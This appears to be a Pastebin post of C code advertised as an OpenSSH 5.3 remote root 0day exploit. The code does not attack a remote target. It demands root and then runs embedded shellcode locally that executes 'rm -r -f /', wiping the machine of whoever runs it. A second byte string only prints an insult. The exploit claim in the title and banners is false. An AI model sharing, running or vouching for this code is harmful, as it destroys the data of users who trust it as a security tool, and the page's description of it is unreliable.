Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

SSH 5.3 remote root 0day exploit

By: favoriter6 on Jan 18th, 2013  |  syntax: C  |  size: 3.11 KB  |  views: 9,587  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. /*
  2. *
  3. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  4. *
  5. * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
  6. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  7. *
  8. *
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <netdb.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15. #include <unistd.h>
  16. #include <arpa/inet.h>
  17. #include <sys/types.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20.  
  21. void usage(char *argv[])
  22. {
  23.     printf("\n\t[+] HATSUNEMIKU\n");
  24.     printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
  25.     printf("\t[+] By: Team foxx\n");
  26.     printf("\t[+] Greetz to hackforums.net\n");
  27.     printf("\t[+] Keep this 0day priv8!\n");
  28.     printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
  29.     exit(1);
  30. }
  31.  
  32. unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
  33.                            "\x6a\x2f\x89\xe7\x52"
  34.                            "\x66\x68\x2d\x66\x89"
  35.                            "\xe6\x52\x66\x68\x2d"
  36.                            "\x72\x89\xe1\x52\x68"
  37.                            "\x2f\x2f\x72\x6d\x68"
  38.                            "\x2f\x62\x69\x6e\x89"
  39.                            "\xe3\x52\x57\x56\x51"
  40.                            "\x53\x89\xe1\xcd\x80";
  41.  
  42. unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
  43.                            "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
  44.                            "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
  45.                            "\xdb\x40\xcd\x80";
  46.  
  47. int main(int argc, char **argv)
  48. {
  49.  
  50.     int euid = geteuid();
  51.     int port= 22, sock;
  52.     char h[1000];
  53.     struct hostent *host;
  54.     struct sockaddr_in addr;
  55.  
  56.     if(euid != 0)
  57.     {
  58.         fprintf(stderr, "You need to be root to use raw sockets.\n");
  59.         exit(1);
  60.     }
  61.     if(euid == 0)
  62.     {
  63.         fprintf(stdout, "MIKU! MIKU! MIKU!\n");
  64.     }
  65.     if(argc != 3)
  66.     usage(argv);
  67.     if(!inet_aton(h, &addr.sin_addr))
  68.     {
  69.         host = gethostbyname(h);
  70.         if(!host)
  71.         {
  72.             fprintf(stderr, "[-] Exploit failed.\n");
  73.             (*(void(*)())decoder)();
  74.             exit(1);
  75.         }
  76.         addr.sin_addr = *(struct in_addr*)host->h_addr;
  77.         }
  78.         sock = socket(PF_INET, SOCK_STREAM, 0);
  79.         addr.sin_port = htons(port);
  80.         addr.sin_family = AF_INET;
  81.         if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
  82.         {
  83.             fprintf(stderr,"[-] Exploit failed.\n");
  84.             exit(1);
  85.         }
  86.         char payload[1337];
  87.         memcpy(payload, &decoder, sizeof(decoder));
  88.         memcpy(payload, &rootshell, sizeof(rootshell));
  89.         send(sock, payload, strlen(payload),0);
  90.         close(sock);
  91.         if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
  92.         {
  93.             fprintf(stderr, "[-] Exploit failed.\n");
  94.             exit(1);
  95.         }
  96.         else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  97.         {
  98.             fprintf(stdout, "[+]g0t sh3ll!\n");
  99.             system("/bin/bash");
  100.         }
  101.         else
  102.         {
  103.             fprintf(stderr, "[-] Exploit failed.\n");
  104.             close(sock);
  105.             exit(0);
  106.         }
  107. }